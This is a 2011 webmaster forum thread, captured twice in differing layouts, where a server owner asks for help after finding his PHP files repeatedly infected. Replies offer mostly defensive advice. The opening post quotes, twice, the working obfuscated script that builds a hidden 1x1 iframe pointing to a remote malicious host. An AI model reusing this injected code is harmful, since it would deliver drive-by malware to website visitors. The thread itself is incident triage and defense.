Server comprimised, now what? - GoFuckYourself.com

camperjohn64 · 08-25-2011, 09:08 AM

I am getting this script, attached to the end of my PHP scripts all over my server:

Code:

<script>yd='co';mh='m';im='a.';rm='h';my='5';t='m/';qg='v';vp='if';x='me';a='p:/';gv='a';q='/r';xk='.';ei='htt';y='k';cw='9';w='s';u='8';dk='ra';f='ytv';iy='e';l='jus';b='ew';hh='rc';h='t';vu=vp.concat(dk,x);qm=w.concat(hh);ka=ei.concat(a,q,b,gv,l,iy,qg,im,yd,t,y,cw,u,my,f,xk,rm,h,mh);var tq=document.createElement(vu);tq.setAttribute('width','1');tq.setAttribute('height','1');tq.frameBorder=0;tq.setAttribute(qm,ka);document.body.appendChild(tq);</script>

I wrote a script to delete it, changed the passwords, but it's still showing up ever xxx hours.

Now what??!!?!!

1) How can I find if the server is comprimised?

2) How can I find if it's a script on my server that is automatically adding it?

3) What to do??

JM

Here is what I find on the net about that script:

http://blog.unmaskparasites.com/2011...ction-k985ytv/

bronco67 · 08-25-2011, 09:11 AM

Your spelling skills have been compromised. Sorry, I couldn't resist.

96ukssob · 08-25-2011, 09:12 AM

sounds like you have a virus on your server, not that someone hacked it. had this happen a few years ago with a shitty host and had the same problem.

ask your host to run a virus scan or install some virus software. change all passwords, including root and disable SSH users (only 1 if you use it) and make sure if you have a way to upload files to one of your sites (i.e. videos) that you only allow certain formats and exclude .exe, etc, files.

baddog · 08-25-2011, 09:15 AM

Contact your host.

Klen · 08-25-2011, 09:15 AM

You should be able to figure out that by yourself,i mean you are hardcore programmer so you should be more qualified then me for example

Unless i mistaken you for someone else

bns666 · 08-25-2011, 09:20 AM

btw also check your win pc/laptop where you have saved ftp/ssh access passwords for your server, problem might be there, not on the server.

happened to me few years ago.

scuba steve · 08-25-2011, 09:21 AM

hosting company should be able to fix/remedy it

isprime is always on top of this for us, most companies are

Connor · 08-25-2011, 09:27 AM

Who does your sys admin? You can hire someone if you have the budget for it.

camperjohn64 · 08-25-2011, 09:27 AM

Quote:

Originally Posted by bronco67

Your spelling skills have been compromised. Sorry, I couldn't resist.

Thanks.

I changed all passwords, disabled most ssh access. I read it is a FTP stolen password problem, so perhaps changing passwords will fix.

The real problem is, I am the host, and this is my first co-located server. I sense a learning experience coming on...

rowan · 08-25-2011, 09:28 AM

If you're lucky it's just a script hole rather than a full blown server compromise. The code keeps reappearing because you're treating the symptom (deleting the code) rather than the problem (how they're creating that code)

Your host should be the first step in asking for help. Ask if any unusual IPs have accessed your account via FTP. They may also be able to check web server logs for suspicious activity.

As the article you linked suggests, the problem may be related to your own computer, ie something running in the background and sniffing passwords.

rowan · 08-25-2011, 09:29 AM

Quote:

Originally Posted by camperjohn64

The real problem is, I am the host, and this is my first co-located server. I sense a learning experience coming on...

Ok, well that complicates things a bit. Do you know anything about server admin? And I don't mean clicking buttons on a control panel webpage...

raymor · 08-25-2011, 09:34 AM

The second half of this page will give you a general outline as to how to
secure you server - fixing stupid default PHP settings, getting rid of unused scripts,
turning off suexec for sure, etc.:

https://bettercgi.com/strongbox/pass...adyhacked.html

Of course there have been 1,200 page books written on the topic, so that one page
isn't comprehensive. You may need to talk to someone who has read the 1200 page books.
If they can;t get it, talk to someone who has WRITTEN one of the 1200 page books.

camperjohn64 · 08-25-2011, 09:45 AM

Quote:

Originally Posted by rowan

Ok, well that complicates things a bit. Do you know anything about server admin? And I don't mean clicking buttons on a control panel webpage...

Yes, actually I don't use a control panel. I wanted to make sure I learned all the linux command line issues from the ground up. I have webmin, but never use it. Maybe I should disable that.

I have updated all software, changed all passwords, no suexec, changed ports for ssh, turned off all default settings for apache / php / phpmyadmin.

The server is at 67.21.112.158...please test if you can get in or there is something I should fix asap.

Oops, first thing is to change the default welcome page. :-(

camperjohn64 · 08-25-2011, 09:52 AM

Quote:

Originally Posted by rowan

If you're lucky it's just a script hole rather than a full blown server compromise. The code keeps reappearing because you're treating the symptom (deleting the code) rather than the problem (how they're creating that code)
...

I think this is the case. On accounts that I have changed the passwords on, it *appears to no longer be infecting those accounts.

I'm a good php progammer, but a lousy admin.

PornDiscounts-R · 08-25-2011, 10:02 AM

Quote:

Originally Posted by camperjohn64

I think this is the case. On accounts that I have changed the passwords on, it *appears to no longer be infecting those accounts.

I'm a good php progammer, but a lousy admin.

The url in your sig is giving a nice big trojan warning too

camperjohn64 · 08-25-2011, 10:08 AM

Quote:

Originally Posted by thebestamateur

The url in your sig is giving a nice big trojan warning too

Thank you. Fixing.

I think I will turn off proftp for a few hours and see if the script appears. This will confirm if its getting in through that.

Babaganoosh · 08-25-2011, 10:38 AM

FTP? Yikes, don't use FTP. Remove any ftp daemon on the box and use SSH.

iamtam · 08-25-2011, 10:47 AM

it probably isn't ftp. it is probably some out of date software on your machine with an sql injection or overflow that allows them to access your machine. check all software you use (like wordpress, phpmyadmin, or others) for more recent updates. check for files with 777 permissions, which is always a problem and check things like upload directories for .jpg.php files (which usually pass sanitizers).

CYF · 08-25-2011, 10:58 AM

there is malware for PCs that will use your stored FTP passwords and upload crap to your servers. Might want to check into that as well.

Babaganoosh · 08-25-2011, 11:15 AM

Are you a filezilla user by chance? This is something they're faced with more and more often.

camperjohn64 · 08-25-2011, 11:23 AM

Quote:

Originally Posted by CYF

there is malware for PCs that will use your stored FTP passwords and upload crap to your servers. Might want to check into that as well.

I think this was the case. I reformatted my main machine about two weeks ago because "something funny" was going on. That was the only machine that I was using to upload to the sites that were hacked.

So the root SSH was not comprimised, nor were any accounts for friends that I am hosting. Suggesting, the problem was that machine was freely sending out passwords.

All accounts changed, new machine has new virus software on it, server "appears" stable as of 10am...

The good thing is that it appears my home machine was hacked, not the server itself. Also, I don't have any ability to FTP to any sites that are important. Only ssh on non-standard ports.

I will disable remote-root password ability once this blows over. Must login to another account, then su if I want to get to root - I forget what that feature is called.

livexxx · 08-25-2011, 06:18 PM

quite often someone will have uploaded a script somehow onto the server that is sitting in an image upload dir or some other directory. They can then call that up every now and then and it just fires off and scans all your dirs and adds that script to the end of files. So changing your passwords etc is like after the horse has bolted. try doing something like scan all your files for some of those data patterns providing they didnt encrypt their upload.

CYF · 08-25-2011, 06:27 PM

Quote:

Originally Posted by camperjohn64

I will disable remote-root password ability once this blows over. Must login to another account, then su if I want to get to root - I forget what that feature is called.

are you talking about using public keys instead of passwords? That's what I do on my machines.

I would also suggest not using ftp anymore. sftp is so much better. Also would recommend against storing passwords anywhere.

camperjohn64 · 08-25-2011, 06:29 PM

Quote:

Originally Posted by livexxx

quite often someone will have uploaded a script somehow onto the server that is sitting in an image upload dir or some other directory. They can then call that up every now and then and it just fires off and scans all your dirs and adds that script to the end of files. So changing your passwords etc is like after the horse has bolted. try doing something like scan all your files for some of those data patterns providing they didnt encrypt their upload.

I turned off proftpd and the script is still being added to the files. This means it isn't a ftp upload / password issue. The horse has bolted.

This means the server, is infected with something.

It seems this will be my project for tonight. Must eat dinner now, but will try to find it.

Thoughts?

HomerSimpson · 08-25-2011, 06:33 PM

now you hire me...

www.awmzone.com/services

08-25-2011, 09:08 AM	#1
camperjohn64 Confirmed User Industry Role: Join Date: Feb 2005 Location: Los Angeles Posts: 1,531	Server comprimised, now what? I am getting this script, attached to the end of my PHP scripts all over my server: Code: <script>yd='co';mh='m';im='a.';rm='h';my='5';t='m/';qg='v';vp='if';x='me';a='p:/';gv='a';q='/r';xk='.';ei='htt';y='k';cw='9';w='s';u='8';dk='ra';f='ytv';iy='e';l='jus';b='ew';hh='rc';h='t';vu=vp.concat(dk,x);qm=w.concat(hh);ka=ei.concat(a,q,b,gv,l,iy,qg,im,yd,t,y,cw,u,my,f,xk,rm,h,mh);var tq=document.createElement(vu);tq.setAttribute('width','1');tq.setAttribute('height','1');tq.frameBorder=0;tq.setAttribute(qm,ka);document.body.appendChild(tq);</script> I wrote a script to delete it, changed the passwords, but it's still showing up ever xxx hours. Now what??!!?!! 1) How can I find if the server is comprimised? 2) How can I find if it's a script on my server that is automatically adding it? 3) What to do?? JM Here is what I find on the net about that script: http://blog.unmaskparasites.com/2011...ction-k985ytv/ __________________ www.gimmiegirlproductions.com Last edited by camperjohn64; 08-25-2011 at 09:09 AM..

08-25-2011, 09:11 AM	#2
bronco67 Too lazy to set a custom title Join Date: Dec 2006 Posts: 29,032	Your spelling skills have been compromised. Sorry, I couldn't resist. __________________

08-25-2011, 09:12 AM	#3
96ukssob So Fucking Banananananas Industry Role: Join Date: Mar 2003 Location: If I was in your ass you'd know it Posts: 12,991	sounds like you have a virus on your server, not that someone hacked it. had this happen a few years ago with a shitty host and had the same problem. ask your host to run a virus scan or install some virus software. change all passwords, including root and disable SSH users (only 1 if you use it) and make sure if you have a way to upload files to one of your sites (i.e. videos) that you only allow certain formats and exclude .exe, etc, files. __________________ Email: Clicky on Me

08-25-2011, 09:20 AM	#6
bns666 Confirmed Fetishist Industry Role: Join Date: Mar 2005 Location: Fetishland Posts: 11,539	btw also check your win pc/laptop where you have saved ftp/ssh access passwords for your server, problem might be there, not on the server. happened to me few years ago. __________________ ⭐ CAM SODA ⭐ STRIPCHAT ⭐ ⭐ CHATURBATE ⭐ X LOVE CAM ⭐

08-25-2011, 09:21 AM	#7
scuba steve Confirmed User Join Date: Oct 2008 Location: i'm in miami bitch Posts: 1,888	hosting company should be able to fix/remedy it isprime is always on top of this for us, most companies are __________________

08-25-2011, 09:15 AM	#4
baddog So Fucking Banned Industry Role: Join Date: Apr 2001 Location: the beach, SoCal Posts: 107,089	Contact your host.

08-25-2011, 09:15 AM	#5
Klen Industry Role: Join Date: Aug 2006 Location: Little Vienna Posts: 32,235	You should be able to figure out that by yourself,i mean you are hardcore programmer so you should be more qualified then me for example Unless i mistaken you for someone else

08-25-2011, 09:27 AM	#8
Connor Confirmed User Join Date: Feb 2003 Posts: 1,294	Who does your sys admin? You can hire someone if you have the budget for it. __________________ YNOT v5 IS NOW LIVE! \| SEEN YNOT MAIL YET?

08-25-2011, 09:28 AM	#10
rowan Too lazy to set a custom title Join Date: Mar 2002 Location: Australia Posts: 17,393	If you're lucky it's just a script hole rather than a full blown server compromise. The code keeps reappearing because you're treating the symptom (deleting the code) rather than the problem (how they're creating that code) Your host should be the first step in asking for help. Ask if any unusual IPs have accessed your account via FTP. They may also be able to check web server logs for suspicious activity. As the article you linked suggests, the problem may be related to your own computer, ie something running in the background and sniffing passwords.

08-25-2011, 09:34 AM	#12
raymor Confirmed User Join Date: Oct 2002 Posts: 3,745	The second half of this page will give you a general outline as to how to secure you server - fixing stupid default PHP settings, getting rid of unused scripts, turning off suexec for sure, etc.: https://bettercgi.com/strongbox/pass...adyhacked.html Of course there have been 1,200 page books written on the topic, so that one page isn't comprehensive. You may need to talk to someone who has read the 1200 page books. If they can;t get it, talk to someone who has WRITTEN one of the 1200 page books. __________________ For historical display only. This information is not current: support@bettercgi.com ICQ 7208627 Strongbox - The next generation in site security Throttlebox - The next generation in bandwidth control Clonebox - Backup and disaster recovery on steroids

08-25-2011, 10:38 AM	#17
Babaganoosh ♥♥♥ Likes Hugs ♥♥♥ Industry Role: Join Date: Nov 2001 Location: /home Posts: 15,841	FTP? Yikes, don't use FTP. Remove any ftp daemon on the box and use SSH.

08-25-2011, 10:47 AM	#18
iamtam So Fucking Banned Join Date: Feb 2010 Posts: 1,211	it probably isn't ftp. it is probably some out of date software on your machine with an sql injection or overflow that allows them to access your machine. check all software you use (like wordpress, phpmyadmin, or others) for more recent updates. check for files with 777 permissions, which is always a problem and check things like upload directories for .jpg.php files (which usually pass sanitizers).

08-25-2011, 10:58 AM	#19
CYF Coupon Guru Industry Role: Join Date: Mar 2009 Location: Minneapolis Posts: 10,973	there is malware for PCs that will use your stored FTP passwords and upload crap to your servers. Might want to check into that as well. __________________ Webmaster Coupons Coupons and discounts for hosting, domains, SSL Certs, and more! AmeriNOC Coupons \| Certified Hosting Coupons \| Hosting Coupons \| Domain Name Coupons

08-25-2011, 11:15 AM	#20
Babaganoosh ♥♥♥ Likes Hugs ♥♥♥ Industry Role: Join Date: Nov 2001 Location: /home Posts: 15,841	Are you a filezilla user by chance? This is something they're faced with more and more often.

08-25-2011, 06:18 PM	#22
livexxx Confirmed User Industry Role: Join Date: May 2005 Location: UK Posts: 1,201	quite often someone will have uploaded a script somehow onto the server that is sitting in an image upload dir or some other directory. They can then call that up every now and then and it just fires off and scans all your dirs and adds that script to the end of files. So changing your passwords etc is like after the horse has bolted. try doing something like scan all your files for some of those data patterns providing they didnt encrypt their upload.

08-25-2011, 06:33 PM	#25
HomerSimpson Too lazy to set a custom title Industry Role: Join Date: Sep 2005 Location: Springfield Posts: 13,826	now you hire me... www.awmzone.com/services __________________ Make a bank with Chaturbate - the best selling webcam program Ads that can't be block with AdBlockers !!! /// Best paying popup program (Bitcoin payouts) !!! PHP, MySql, Smarty, CodeIgniter, Laravel, WordPress, NATS... fixing stuff, server migrations & optimizations... My ICQ: 27429884 \| Email: